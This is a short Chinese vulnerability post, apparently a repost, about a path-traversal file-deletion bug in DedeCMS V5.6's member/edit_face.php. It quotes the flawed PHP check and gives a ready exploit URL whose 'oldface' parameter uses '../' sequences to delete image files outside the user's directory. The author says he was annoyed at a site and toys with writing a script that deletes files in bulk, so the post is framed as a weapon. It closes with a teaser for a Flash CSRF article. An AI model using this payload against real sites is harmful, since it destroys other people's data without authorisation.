edit_face.php
else if($dopost=='delold') //45行
{
if(empty($oldface))
{
ShowMsg("没有可删除的头像!", "-1");
exit();
}
$userdir = $cfg_user_dir.'/'.$cfg_ml->M_ID;
if(!ereg('^'.$userdir, $oldface))
{
$oldface = '';
}
if(eregi(".(jpg|gif|png)$", $oldface) && file_exists($cfg_basedir.$oldface))
{
@unlink($cfg_basedir.$oldface);
}
只判断oldface 前面是否在目录下,没包括过滤 ../
但有验证 .(jpg|gif|png)$ ,所以只能删除 jpg , gif ,png 类型的文件。
那天看那个站不爽,写个遍列删除的也爽YY了。
利用:
http://localhost/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif文章来源于lcx.cc:【漏洞】DEDECMSV5.6 删除文件BUG
相关推荐: Flash CSRF 的成因、用途、发现、利用与防御,知识科普
目录 0x00 Flash CSRF名词解释 0x01 Flash CSRF形成的原因 0x02 Flash CSRF可以干些什么 0x03 Flash CSRF如何利用 0x04 Flash CSRF怎么防御 0x00 Flash CSRF名词解释 CSRF…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论